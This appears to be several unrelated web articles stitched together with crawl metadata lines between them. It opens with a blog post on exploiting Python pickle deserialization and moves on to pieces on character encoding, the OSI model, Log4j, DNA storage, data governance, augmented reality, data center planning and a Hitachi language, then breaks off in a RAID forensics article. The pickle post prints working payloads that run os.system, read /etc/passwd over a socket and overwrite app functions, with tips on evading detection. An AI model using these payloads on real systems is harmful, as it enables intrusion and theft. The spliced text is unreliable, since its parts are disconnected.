When building applications we often have to take an object that exists in memory and convert it to something we can send over the network, write to a file, or store in a database. Serialization is the concept of taking that object and converting it into a form that is safe for writing.
On the other hand, Deserialization is the process of taking that serialized data and returning it to a form we can work with in a programming language. Each language has different means of performing this function (and thus different ways to exploit it).
Almost every serialization framework or library will heavily recommend you only deserialize data that is coming from a safe location. However, what happens when developers don’t heed this warning? Or when an adversary gets through the perimeter to a location the devs thought was safe? This provides an opportunity for us to insert malicious serialized data that may have adverse effects on the software.
The impacts of Insecure Deserialization attacks range from Denial of Service (DoS), to potentially Remote Code Execution (RCE), or escalation of privileges. All of these outcomes can be very serious. At the end of this article I introduce what I feel is an untapped potentiality of deserialization attacks that could be more advantageous (if a bit difficult) for attackers.
Let’s take the following example of a simple Python program. The goal is for it to serialize the information of a song and write it to a file. After a short period of time it will then read in data from that file.
#!/usr/bin/env python3 import pickle, time class Song: def __init__(self, title, length_in_seconds, singer): self.title = title self.length_in_seconds = length_in_seconds self.singer = singer track1 = Song("Happy Birthday", "37", "Everyone") # Write track metadata to file pickle.dump(track1, open('track_file','wb')) time.sleep(3) loaded_track = pickle.load(open('track_file','rb')) print(loaded_track.title)
You may notice that to do this we are using a library called pickle. Pickle is the standard Python library for serializing and deserializing data. And as the notice I linked to earlier mentioned, it has some security concerns.
It is possible to generate serialized data that will execute on the host under the privilege of the existing Python process. For example, let’s create a pickle that will launch
#!/usr/bin/env python3 import pickle, os class SerializedPickle(object): def __reduce__(self): return(os.system,("ls -la",)) pickle.dump(SerializedPickle(), open('malicious_pickle','wb'))
Now what is happening here? We are defining a class with a __reduce__ method. __reduce__ is a special method that is referenced when we are serializing data. The reduce function essentially tells the pickle library how to serialize the object. Then, when we are unserializing the data, this information is used to rebuild the object.
In our case, the object that is being rebuilt is a call to os.sytem which will execute the command of our choosing. In case you were wondering the serialized data looks like the following.
Now if we again run our music_reader script and quickly move our malicious_pickle file, we can have our code executed on the host as shown below.
From here it makes sense how we could use this to further exploit the system. We could send ourselves a reverse shell or begin deleting data to DoS the service, etc. While poking around at some code recently, I found a deserialization bug similar to this and wondered if I could go further.
While gaining a shell is every hacker’s goal it does have some downsides. By gaining a shell on the server you start leaving artifacts that defenders can use to detect you. The process of a reverse shell sticks out like a sore thumb, the commands you execute may show up in logs, etc.
How can we still accomplish what we want (further pwnage) without big Blue ruining our fun?
Code Injection attacks are cool, but without a vehicle for the payload we can’t exploit them. How can we force them to work? Deserialization attacks.
By launching code injection from a Insecure Deserialization vuln, I’d like to introduce what I feel is a style of attack that is more beneficial for Red Teamers and Penetration Testers.
To illustrate this let’s look at the following example in Python 2.7 (this is important as different Python versions require different methods to exploit. More on this later).
@app.route('/') def home(): cPickle.loads(str(request.args.get('pickle'))) return finished() def finished(): return "The function completed!
This is a snippet of an example Flask application (you can find the full version here). This application will deserialize data it receives from the ‘pickle’ argument and then call the ‘finished’ function to display that the job is done. What if we overwrite the finished function to do something else? For this, we are going to serialize a special object.
Eval will evaluate (surprise) our code under the current namespace as the rest of the application. Meaning when the object is deserialized and we get code execution, we can interact with variables and other data structures.
Compile will compile (again, surprise) our code into a format that eval can then execute.
The specific example above will modify the ‘finished’ function to instead return a new message.
For Python 3 things are actually a little easier. With Python 3, exec is a part of the built-in functions meaning that we only need to call a single function. Exec is similar to eval with a couple differences, however the key one is that in Python 3 exec is actually a function and not a statement. This prevented us from using it in Python 2.
Take for example this vulnerable application that listens for serialized data over the network.
#!/usr/bin/env python3 import socket, pickle HOST = "0.0.0.0" PORT = 9090 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.bind((HOST, PORT)) s.listen() connection, address = s.accept() with connection: print("My friend at ", address, " sent me some data") received_data = connection.recv(1024) pickle.loads(received_data)
Because this is Python 3 we can exploit this with the following script.
#!/usr/bin/env python3 import socket, pickle, builtins HOST = "127.0.0.1" PORT = 9090 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as r: print(r.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle()))
Here we are opening /etc/passwd and printing it’s contents.
So why go through with all this work? It seems like a hassle. Well there are some keen benefits if we play our cards right. First, because we are executing our code in the same namespace, we can do things like reference global variables, view environment variables, or modify functions. With the help of the inspect library we could retrieve the source code of the application. Database involved? We could potentially leverage that connection to start querying the database as the application.
There are also OPSEC benefits. First, let’s compare RCE achieved through deserialization. For this, we alter our payload to use the standard Python reverse shell and take a look at the process list.
Clearly this looks pretty shady. If this gets picked up in a process list or a bash history it will throw some alarms (excluding them noticing the network traffic). On the flip side, let’s instead do code injection, and this time sleep for 20 seconds to demonstrate.
Hmmmm, nothing anomalous. Nothing strange. The app is running just like it normally would right? By using the existing application as a cover you can potentially slip through some detection or notice.
And of course from here you can do all the things you normally would with a reverse shell/beacon. Plunder files, pivot to other hosts, etc.
Obviously there are some challenges that should be mentioned. Persistence, for example, would be difficult given this setup, as you are running everything in process memory. You could theoretically modify source code however in today’s containerized world those changes aren’t likely to stick around.
You would need a unique implant for each language you are targeting. Which takes time with developing tooling and testing.
While I was researching to put this article together I wanted to know what language was the most susceptible to deserialization attacks (I recognize that being exploited more frequently does not necessarily correlate to being more vulnerable). In doing so I stumbled upon this post by Vickie Li. She did some really awesome research that helped me to come to an answer (or at least something vaguely close to an answer). Based on public HackerOne reports, the language with the greatest number of deserialization vulns is PHP by more than 50%!
Thus I will discuss how to perform deserialization attacks in PHP along with some code injection fun in part two of this series. | <urn:uuid:f6bce4a0-9a8e-4b89-957b-0731e8e37dc7> | CC-MAIN-2022-40 | https://frichetten.com/blog/escalating-deserialization-attacks-python/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00162.warc.gz | en | 0.911438 | 2,334 | 2.953125 | 3 |
In the beginning were C and C++, and hosts of other computer programming languages. These are all based on ASCII (American Standard Code for Information Interchange), which as the name implies is based on the English alphabet. Which wouldn’t be an issue except there are lot of other humans in the world, and they don’t use the English alphabet.
So along came Unicode to the rescue. Unicode provides a framework for all alphabets of the world to be represented on computers. UTF-8 is the most popular Unicode implementation because it preserves backwards compatibility with ASCII. Which is all fun to know, but what good is it when you’re looking at piles of computer files that need to converted from ISO-8859-1 (Latin-1, Western European) into whatever encoding you prefer? Naturally, there are a number of utilities just for this task.
GNU Recode supports over 150 character sets, and converts just about anything to anything. For example, there are still users of legacy Linux systems that still run ISO-8859-1. Recode will convert these to nice modern UTF-8, like this:
$ recode UTF-8 recode-test.txt
Check out the GNU Recode Manual for instructions.
That’s fast and easy enough, but there’s one more job- converting the filename. The convmv command is just the tool for this job. This example converts all the ISO-8859-1 filenames in the files/ directory to UTF-8:
$ convmv -f iso-8859-1 -t utf8 --notest files/
convmv run without the –notest option does a dry-run without changing anything, which is probably a wise thing to do first.
Maybe you have a file that you don’t know what the encoding is. Upload your file to this online tool and it will tell you. You can even do file conversions here.
The subject of character encoding is huge and bewildering, especially for us dinosaurs from the typewriter era. By golly, when you hit a typewriter key it came out the same way every single time. Wikipedia has a number of excellent introductory articles:
This article was first published on LinuxPlanet.com. | <urn:uuid:f5f308a5-717a-4d6a-8b3e-5c64fc710c4c> | CC-MAIN-2022-40 | https://www.datamation.com/open-source/conquering-character-encoding-chaos-with-gnu-recode/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00162.warc.gz | en | 0.908912 | 477 | 3.609375 | 4 |
The structure of the Internet is modeled on the Open Systems Interconnection (OSI) model. The OSI model is a framework used for all communications in the cloud. The OSI model represents the interfaces and protocols used to communicate between devices. Every network device must adhere to the rules and standards that this model represents, so each device can communicate with the other devices in the network.
A representation of the model is shown in Figure 1. Each layer has a name and a layer number. The application layer at the top is layer 7 and is closest to the end user. The physical layer at the bottom is layer 1 and is closest to the computer.
Figure 1: OSI Model with Seven Layers
Host Layers of OSI Model
A web browser interacts with the application layer of the OSI model using commands supplied by the application layer to communicate. This functionality is called an Application Program Interface (API). An API contains the programming instructions, protocols, and tools used to communicate. APIs specify how software components interact with each other. Another way of looking at this process is, the browser wants to communicate with the website requested, so it formats a command for the application layer using the API and issues the command. The application layer interprets the command, verifies it for syntax, and processes the command.
The next step in the OSI model is to process the command and pass it to the presentation layer. Differences in how data is represented are resolved here, including converting EBCDIC data to ASCII data. Encryption and decryption are typically handled in the presentation layer, or it can be done in the application, session, transport, or network layers.
The presentation layer ensures that information from the application layer is readable by the next layer, the session layer. As the request flows through the stack, the session layer sets up the rules needed for the two devices to communicate.
The transport layer breaks large messages into smaller chunks called segments. The other function of the transport layer is to make sure that all communications are completed successfully by using a notification process based on acknowledgments. The transport layer ensures the successful transmission and reception of the data; this assurance is called reliability.
Media Layers of OSI Model
The network layer of the OSI layer is responsible for path determination. The logical path to the destination is derived from the network address. Network addresses, or logical addresses, are normally IPv4 or IPv6 addresses.
Data Link Layer
Network layer packets are passed to the data link layer where the logical address (IP address) is converted to the Media Access Control (MAC) address of the next device in the path to the destination.
All of the information, including the data, is placed in the output buffer of the network interface card (NIC) and then transmitted onto the network media. The NIC and network media reside at the physical layer of the OSI model.
OSI Layer Functions
The message propagates over the network media. Every device that can hear the transmission will receive the message in its NIC input buffer at the physical layer of OSI model.
The NIC passes the message to the data link layer. Once at the data link layer, the destination MAC address is evaluated to determine if the message is designated for ‘this’ physical device. If not, the message is ignored. However, if ‘this’ is the correct destination, the message is passed to the network layer.
At the network layer, the IP address is evaluated to determine if ‘this’ is the correct logical destination. If not, this is just a hop on the path to the destination. The IP address is converted into a network address, and the logical path of the next hop is determined from the routing table. The message is passed back down through the stack and transmitted out. This process is repeated until the destination is reached. If ‘this’ is the correct destination, the information is passed through the OSI model to the transport layer where all of the parts of the message are reassembled, and an acknowledgment is sent to the sender, letting the sender know that the message was received. This process is the acknowledgment function of TCP/IP.
The message is passed through the stack, to each succeeding layer until the application needed to resolve the request is reached, and a response is prepared. The response is then passed back through the OSI layers beginning with the application layer.
Cloud Data Centers
A cloud data center (DC) environment consists of several components that comprise its architecture. Common components include clients, one or more web APIs, and the underlying network. The network connects users to the cloud infrastructure and is responsible for interconnectivity within the cloud DC. Figure 2 illustrates about DCs in a cloud environment.
Figure 2: Components of Cloud Computing
A cloud DC is a mix of telecom, facilities, network appliances, network fabric, servers, and software. The Client-side consists of any network-ready device, such as a computer, tablet, or smartphone. The connection between the two is the Internet.
A cloud DC has the following components:
- Telecom is the hardware and services needed to connect to the Internet.
- Facilities represent the building, power, air conditioning, and water needed to house and run the equipment
- Network Appliances include firewalls, routers, switches, SANs, and other associated networking equipment.
- Network Fabric defines all the cables used to interconnect the network equipment and the servers, as well as specialized switches designed for virtualization and storage environments.
- Servers include both physical and virtual servers that are used within the cloud infrastructure.
- Software describes the software needed in order to serve the customers.
APIs contain a set of programming instructions, protocols, and tools for accessing programs. These programs, in turn, provide the services needed to manage the DC. APIs are at the heart of cloud services.
The fabric of a DC is its network. The network provides the path or route needed for the servers, routers, switches, storage arrays, and other components to communicate. Further, the network provides the services requested by the client. It is the same fabric that allows DCs to talk to other DCs, for workload sharing and redundancy in case of disaster. | <urn:uuid:ff57ac57-7c22-4701-b89b-f0326a2a1615> | CC-MAIN-2022-40 | https://electricala2z.com/cloud-computing/osi-model-layers-7-layers-osi-model/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00162.warc.gz | en | 0.900249 | 1,303 | 4.28125 | 4 |
What is the Apache Log4j Vulnerability?
The Log4j vulnerability allows threat actors to execute code remotely on a targeted computer.
What is Log4j?
Log4j is a Java library for logging error messages in applications.
What is Log4j used for?
Log4j is used in both consumer and enterprise services to log security and performance information. It is used in websites, applications, and operational technology products.
What versions of Apache’s Log4j are affected by the vulnerability?
Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as “Log4Shell” and “Logjam.”
Need Immediate Help?
How to protect against the Log4j vulnerability:
- Prioritize patching.
- Enumerate internet-facing endpoints that use Log4j*.
- Ensure your security operations center (SOC) is actioning alerts on these devices*.
- Install a web application firewall (WAF) with rules that automatically update so that your SOC is able to concentrate on fewer alerts*.
- Apply software updates as soon as they are available.
- If you suspect you have been affected by the Log4j vulnerability a compromise assessment will determine if threat actors have infected your environment.
- *Recommendations from CISA (https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance)
How can Blue Team Alpha help protect you?
Blue Team Alpha offers a wide range of cybersecurity services. Those that would pertain specifically to the Log4j vulnerability would be our Compromise Assessment services which are part of our AlphaRisk sector. If you feel that your business has been affected by the Log4j vulnerability, do not wait. Other other services include; emergency Incident Response and Remediation services, in-place Incident Response Triage and Management services, IR retainer services, Business Email Compromise services and so much more! Contact us today to learn more about how we can find, eradicate and protect your business. | <urn:uuid:fd90f447-f890-44b7-a146-6d05c25a8525> | CC-MAIN-2022-40 | https://blueteamalpha.com/cybersecurity/apache-log4j-vulnerability/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00362.warc.gz | en | 0.913687 | 444 | 2.671875 | 3 |
While it seems like the stuff of science fiction, researchers have made a lot of progress over the past several years proving that synthetic DNA could make the perfect archival storage medium for files that must be retained but may rarely if ever need to be accessed again.
One of the reasons researchers hold out so much hope for DNA as a storage medium is because of its long-term stability. Solid state drives last about five years before they start to degrade, while magnetic disk might last 10 years, magnetic tape 25 years, and optical disk 25 to 35 years. In contrast, DNA can last thousands of years as long as it’s kept cool and dry.
“Researchers have been able to show that DNA as a storage medium is very power- and space-efficient. We’re talking terabytes of information in literally grams of cell matter. It’s amazing what can be stored in a small amount of DNA,” said Ray Lucchesi, president of Silverton Consulting.
The research Lucchesi is talking about started several years ago. One of the earliest projects was a Harvard group, which successfully transferred the contents of 53,400 word book and several images into DNA. Several other groups since have successfully encoded and stored millions of bits of data in DNA. Microsoft Research also is heavily involved in DNA research. It has been working steadily with the University of Washington, and the partnership has resulted in several breakthroughs: not only did it manage to encode 200 megabytes of digital data to synthetic DNA, but it recently found a way to add the concept of random access to files stored in DNA. Microsoft also has partnered with Twist Bioscience, which has a silicon-based DNA synthesis platform, to work on long-term data storage solutions for DNA.
Assuming that DNA could be easily writable and readable, with reasonable amounts of access time, the potential for storage is huge.
“Today we are reading megabytes or gigabytes per second off of an SSD. You could probably read 100 bytes or 200 bytes off of DNA in the same amount of time,” Lucchesi said. “That’s orders of magnitude more.”
So how does it work?
“It’s essentially the same idea as today’s storage methods,” explains Richard Hammond, technology director and head of synthetic biology at U.K.-based Cambridge Consultants. “With magnetic tape, you arrange the magnets to represent ones and zeros. With DNA, the core idea is the same; it’s a matter of arranging the information into the medium.”
Two of the biggest challenges in making DNA storage a commercial reality are cost and speed. Some estimates put the cost of encoding data at more than $12,000 per megabyte and $220 for retrieval. However, DNA synthesis and sequencing costs are already decreasing and, given time, will reduce even further to a palatable level.
“The cost of sequencing is decreasing, so now it’s cheap to read DNA,” said Christophe Dessimoz, a professor at the University of Lausanne who is an expert in this area. Synthesis costs remain relatively expensive, he said, although he expects it to decrease over time.
One company determined to beat the odds is Catalog Technologies, a start-up working with Cambridge Consultants to build a machine capable of encoding DNA data at a speed of 1TB per 24 hours. Hammond says the difference with the Catalog model is the way data is encoded into the DNA.
“The traditional approach involves writing the data directly into the DNA and creating the DNA one base at a time. That’s slow and expensive,” he explained. “Compare what Catalog has done to a movable type printing press: They have a bunch of standardized letters—in other words, short small pieces of DNA—and they combine the bits of DNA together in the right order.”
By connecting pre-existing pieces of DNA instead of creating DNA from scratch, Catalog will be able to reduce the number of assembly steps, increasing the speed, reducing energy consumption and ultimately, reducing cost.
Catalog envisions its machine as part of a data archiving service offering. An organization would transfer its data to Catalog, which would input the digital data stream into its machine, process it, and use that information to assemble pieces of DNA. The result is a tube with powder—dry DNA with the organization’s encoded information. When an organization requests access to some of the data, Catalog will take it out of storage, re-suspend it to liquid form and run that liquid through its DNA sequencer. It would then convert it back to digital form and run through the inverse of the original algorithm. The result? The original data, in the original format.
The process is complicated, and Catalog doesn’t expect a commercially available offering for a few years. But Hammond hopes that eventually it will help DNA become a cost-effective, fast, reliable way of storing cold, archival data.
In essence, Dessimoz agrees. Most likely he says, organizations will have some combination of long-term DNA storage and short-term solid state storage. It’s just a matter of time. | <urn:uuid:21e4823c-1e94-4654-9691-29388f2c5a5a> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/storage/dna-storage-why-stuff-life-poised-be-stuff-storage | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00362.warc.gz | en | 0.950348 | 1,088 | 3.28125 | 3 |
Data governance is the management of a variety of different aspects of data outside of the core storage and management of data, including availability, security, use, and trustworthiness. Effective data governance tries to strike a balance between preventing misuse and maintaining regulatory compliance with democratizing data.
While many companies have embraced data governance processes for years, it has taken on a much bigger role in the past 15 years. As many organizations expanded the volumes and types of data they captured, governments instituted regulatory controls around data to protect consumers and the increased threats of breaches or misuse created financial risks to these organizations.
The role of data governance has grown over time, moving beyond controls to helping organizations make more effective use of data. For example, while understanding how certain datasets are used helps prevent misuse, it also helps other teams envision other related ways to effectively use and gain greater value from the data.
In the early days of data governance, most data was centralized putting governance in the domain of the core IT and data management teams. As regulatory controls increased, some organizations made governance the responsibility of the Head of Risk or Chief Risk Officer (CRO). More recently, as the role of the Chief Data Officer (CDO) has expanded, the CDO often owns or shares responsibility for data governance.
Most well-designed governance programs are steered by a committee that combines technical, operational, and business owners. This committee will work together to create the guiding principles for governance within the organization and assess risks. Data stewards are typically the people responsible for carrying out the day to day implementation and enforcement of the policies.
It is important to recognize that data governance is not simply a packaged piece of software. It is a framework that implements policies and processes that are a part of the overall governance program. Underlying software and technologies can provide the tools to help implement the framework, but it is up to the data governance team to put in place the policies and processes that best suit their organization.
A good framework will often include the following principles:
Data security and governance are often intertwined. Most frameworks start and end with determining the access controls and security needs of datasets. This is especially critical in highly regulated industries such as financial services, telecommunications, healthcare, and insurance.
Security is also intertwined with all the other principles in a data governance framework. For example:
Data governance tools come in four general categories:
Datameer provides a deep suite of security and governance features and is intentionally designed NOT to replicate already-in-place governance mechanisms but instead work with these controls. These capabilities are well matured from Datameer’s ten years of experience working with large enterprises in highly regulated industries requiring deep security and governance.
Cloud and hybrid environments can create security and governance gaps due to capability mismatches between on-premises enterprise and cloud platforms. Datameer’s deep security and governance features ensure you get the same robust governance in the cloud and you would expect on-premises.
Datameer also integrates with enterprise and cloud security, offers asset-level controls and encryption on the wire and at-rest. It fully integrates with Snowflake security to protect all the data.
From a governance standpoint, Datameer provides many key capabilities:
Webinar Event: Virtual Hands-On Lab – Get hands-on with Analytics for SnowflakeJoin us Oct 5th | <urn:uuid:4c803c8b-02d7-4bef-be54-60c4d04b34c0> | CC-MAIN-2022-40 | https://www.datameer.com/what-is-data-governance/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00362.warc.gz | en | 0.940402 | 678 | 3.125 | 3 |
In the mid-1990s, NASA began a series of ambitious missions to explore Earth’s close interstellar neighbor, Mars. On Dec. 11, 1998, the space agency launched the $193 million research spacecraft the Mars Climate Orbiter—the first interplanetary weather satellite and a vital component of the years-long Martian exploration program involving thousands of man hours.
But less than a year later, on Sept. 23, 1999, the Mars Climate Orbiter came to a premature and mysterious demise. It either disintegrated after a too-low entry into the Martian atmosphere, smashing into the surface of the Red Planet, or it spun off on an unknown trajectory.
Months of investigation pointed to an incredibly simple, and almost unbelievable, reason for the mishap. Engineers had designed the orbiter using English units of measurement while the flight-management team used the more conventional metric system for a key spacecraft operation. The mismatch of units in navigation information led to the craft’s fatal demise.
Simple data, dreadful error.
The loss of the Mars Climate Orbiter presents a strong case for data governance, illustrating the mission-critical nature of systems information. Data uncontrolled and unexamined—ungoverned—can lead to business tribulations ranging from elevated costs to disastrous business failure.
Data governance is key when a company begins to regard its information as a corporate asset. It involves the people and methods required to create a consistent, composite, holistic view of an organization’s accumulated and dynamic information. To govern effectively, organizations are challenged to balance protection with production, essentially weighing effective information access against appropriate data use, across diverse organizations in various geographies. This requires active coordination of complex and interrelated skills, domains and structures.
As guardians, manipulators, evaluators and analyzers of an organization’s data, IT professionals and the companies they serve rely on data governance for three important, yet simple reasons:
- To reconcile the different views of a customer
- To gain confidence in regulatory filings
- To ensure information security
When related companies merge or co-brand, each company comes with its own array of data and, more importantly, data metrics. Inevitably, the information presents dissimilar views of similar content. Likewise, various company entities may offer the same challenges; what R&D refers to as a “thingamabob,” marketing labels a “widget.” Same gadget, different name and, therefore, divergent data.
No IT professional would be surprised by this occurrence. A 2002 survey by The Data Warehousing Institute estimates that businesses in the United States annually lose more than $600 billion in postage, printing and staff time as a result of incorrect customer name and address data. Amazingly, that’s nearly 5 percent of the annual U.S. gross domestic product from something as simple as a wrong address. Data governance yields precision.
The U.S. Securities and Exchange Commission (SEC) mandates that public companies file an accurate view of their business dealings, and it is incumbent upon a company to comply.
In 2005, the SEC stepped in when Instinet and INET ATS were found to have repeatedly provided inaccurate information regarding management of investor orders by their electronic ordering systems. Each company was handed a $2.5 million fine. The SEC recounted that, among other mistakes, the companies’ published data misclassified/miscounted shares, improperly categorized orders and erroneously reported times of transactions. Data debility degrades corporate compliance—sometimes with costly results.
Because they value their information and recognize its power, companies ranging from MasterCard and Wal-Mart to Google and Exxon-Mobil have made data governance a priority. Regarding information as a corporate asset nets operational and capital rewards.
In investigating the loss of the Mars orbiter, a project leader made the case for data governance when he said the team would look at how the data got into the system in English units, how the data was transferred and why the conflicting data wasn’t discovered during the mission.
His assessment: “People make errors. The problem here was not the error. It was the failure of us to look at it end to end and find it.”
Robert Reeg, CTO, is responsible for all computer
operations, network engineering, technology architecture, database
management, program management, testing/software quality and information security at MasterCard Worldwide. | <urn:uuid:ed682494-1f07-4761-9c83-b5f1c41842d2> | CC-MAIN-2022-40 | https://www.cio.com/article/274473/governance-the-mission-critical-impact-of-data-governance-on-your-corporate-assets.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00362.warc.gz | en | 0.926977 | 907 | 2.671875 | 3 |
Characterized by a fusion of technologies that blur the lines between the physical and digital, the Fourth Industrial Revolution is spreading across the manufacturing world. As a component of this revolution, a growing number of suppliers are using augmented reality (AR) to improve operations in workforce training and equipment maintenance.
AR is a technologically enhanced version of reality created by using technology to overlay digital information on an image of something being viewed through a device, such as smart goggles or a smartphone camera. The goggles are often voice-controlled, leaving wearers with both hands free.
Statista estimates the AR market was worth $5.91 billion in 2018, and that it will reach more than $198.7 billion by 2025.(1) The technology naturally has a stronghold in the video games and entertainment sector, but a growing number of manufacturing suppliers, including large automated equipment manufacturers, are utilizing the technology to provide their employees and customers with virtual hands-on instruction for operating machinery, troubleshooting and conducting repairs.
In fact, 10 percent of the Fortune 500 companies have already begun exploring shopping and operation applications for AR.(2) Gartner predicts that by 2020, 20 percent of large enterprises will evaluate and adopt augmented reality, virtual reality and mixed reality solutions as part of their digital transformation strategy.
Training and Maintenance
The “model-based digital twin” is an increasingly popular use for AR technology in manufacturing. The digital twin is a clone of the physical asset, providing a dynamic, self-teaching model to optimize performance in conjunction with an Industrial Internet of Things (IIoT) platform. The combination of machine learning and physics-based modeling enables engineers to create entire AR experiences that show technicians how to service factory floor machines. Using the digital twin, a technician can repair a faulty device in record time and with greater accuracy.(3)
In-person training can be expensive and requires that the equipment be readily available for student training. Companies can use AR tools to provide real-time visual guidance and can connect students with teachers without the cost and logistics of getting everyone in the same room. For example, Bosch Rexroth, a global provider of power units and controls used in manufacturing, uses an AR-enhanced visualization called Hägglunds InSight Live to demonstrate the design and capabilities of its smart, connected CytroPac hydraulic power unit.
The AR application allows customers to see 3-D representations of the unit’s internal pump and cooling options in multiple configurations and how the subsystems fit together.(4) Technicians can also take advantage of smart goggles’ video and photo recording abilities to keep track of progress and keep tabs on errors. Goggles can capture hands-free photos in seconds, and those images can be submitted to off-site teams for troubleshooting help.
Incorporating AR into industrial processes has proven to boost worker productivity. For example, GE healthcare warehouse workers use Skylight, an industrial augmented reality application platform from Upskill, to kit and completely pick list orders up to 46 percent faster.(5) Upskill provides augmented reality software for the industrial workforce, and it boasts an average worker performance boost of 32 percent for Skylight customers.
In GE’s application, Skylight connects to warehouse systems to get real-time information on an item location by connecting to smart warehouse systems. It then gives workers easy-to-read instructions for where to locate items throughout the building. The previously paper-based process, where workers flipped through printed orders to locate parts and waded through depleted stock locations, is now efficient and digitized.
In another use case, Lockheed Martin used Microsoft HoloLens headsets to view holographic renderings of an aircraft’s parts and the instructions on how to assemble them. Microsoft HoloLens offers mixed reality solutions to increase communication and improve efficiency. The AR technology reduced assembly time by 30 percent, and digitizing the workflow helped Lockheed Martin increase engineering efficiency to 96 percent.(6)
Evaluating the Investment
These case studies make a strong argument for AR’s ability to improve manufacturing operations, but manufacturers still may wonder if augmented reality is worth the investment. Companies considering investing in AR should be strategic, approaching the opportunity by establishing the bottom-line value first. Approaching digital with a clear vision and a phased roadmap, and with a focused ecosystem of technology partners will help maximize the return on investment in new technology.
Workforce training and equipment maintenance applications for AR have the potential to help companies get ahead of the capabilities gap and build the culture to sustain that lead.
Bryan Griffen is the director, industry services at PMMI, The Association for Packaging and Processing Technologies. | <urn:uuid:05474376-e4b2-4771-bd83-2e3cfefcb066> | CC-MAIN-2022-40 | https://www.mbtmag.com/home/blog/21102225/augmented-reality-and-the-smart-factory | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00362.warc.gz | en | 0.920588 | 951 | 2.875 | 3 |
Data Center Capacity Planning: Definition, Benefits, and Solutions
Published on June 4, 2020,
What is Data Center Capacity Planning?
Plans are a part of daily life. Not limited to any specific industry, decisions have to be made as a natural part of existence. Leaders, however, are uniquely positioned to not just make decisions but to enable their teams to act according to strategic direction.
Data centers are no exception to this reality. Plans and strategic direction can make tangible differences in not only the data center’s functionality and overall performance but also to the end consumer.
This is why data center capacity planning is crucial.
What is data center capacity planning?
Data center capacity planning is a type of planning which assesses the data center to ensure that the center’s workload can be adequately met.
Practically, data center capacity planning involves a process of assessing the data center—from computing resources, cooling capacity, power load, and more—and then forming and enacting a plan to make sure that all workload demands can be met and even improved upon. As an end result, this planning can reveal areas of improvement and potential dangers which allow leadership to enact plans for data centers to function most optimally.
Why is data center capacity planning important?
Planning can generally serve to enhance operations of any data center, but its importance is being underscored in light of the shifting demands on both physical and virtual assets. With environmental concerns as well as financial needs, more attention is turning to planning to prepare for the future while deferring the consequences of a lack of planning and ill-used or under-utilized assets and financial resources.
Not only does this shifting landscape reveal the need for data center capacity planning, but also such critical analysis of server hardware resources and more has multifaceted benefits to businesses and consumers.
It can give insight into power and cooling to enable optimal function for the given workload as well as attending to network and storage capacity. Careful planning can make sure that mistakes within performance are acknowledged and avoided while ensuring that mission-critical functions are not only safeguarded but also enhanced.
Further, data center capacity planning can eliminate waste and idle assets while decreasing the likelihood of debilitating outages that interrupt business operations.
How can data centers improve their capacity planning?
Basic tools such as spreadsheets traditionally were the most essential assets for planning, but now options such as 3D renderings, virtualization, cloud computing, and even outsourcing has been proffered.
One tool stands out as exponentially beneficial. Many have explored the myriad of benefits from DCIM software to give unique insight and solutions into their capacity planning.
Such tools aren’t the only resource available to help with capacity planning; often the communication between facilities, IT, and additional business decision-makers and leaders must be strengthened in order to continually trouble-shoot, forecast, and adapt.
All in all, selecting tools, enhancing communication, and engaging with data center capacity planning can greatly benefit the data center’s footprint, power consumption, cooling capacity, performance times, load calculations and more. | <urn:uuid:81c1e692-0935-4c69-a7f5-df753aeb56be> | CC-MAIN-2022-40 | https://www.nlyte.com/blog/data-center-capacity-planning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00362.warc.gz | en | 0.938994 | 633 | 2.546875 | 3 |
The major drawback of highly automated manufacturing plants is that they are so capital-intensive that they cost their implementers an arm and a leg to service the debt raised to finance their construction. That means that they have to be kept running at peak output three shifts a day six or seven days a week in order to earn their keep. And that, in turn means that if the market for the products being turned out turns sour, it is vital to be able to reprogram all the robots and control computers to make something else in very short order indeed. The only widely-known manufacturing language designed to address the problem so far is IBM’s A Manufacturing Language, AML, which is derived from Pascal. But Hitachi has been working on its own manufacturing language for some time, and all it now needs is a name. Hitachi says that compared with C or Fortran, its unnamed language requires over 90% fewer lines of code to achieve the same ends. Derived from database management software technology, the new slimline language has only between 30 and 40 commands. Although designed primarily to run on Hitachi’s HIDIC line of factory automation computers, it can also run on mainframes. | <urn:uuid:d4746e84-59a1-41b2-aa06-be0907ae6761> | CC-MAIN-2022-40 | https://techmonitor.ai/technology/hitachi_tilts_at_ibms_aml_with_unnamed_robot_language | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00362.warc.gz | en | 0.971262 | 243 | 2.890625 | 3 |
by Alexander Leonenko
Today we would like to talk about RAID arrays with lost configuration and how to extract evidential data from them. Let’s start with understanding what a RAID is in the first place.
RAID. What is it?
RAID is a Redundant Array of Independent Drives. The system shows it as a virtual storage device with block access. In essence, RAID is a virtual drive.
The purpose of assembling RAID is the creation of storage with higher access speed, larger capacity and greater reliability.
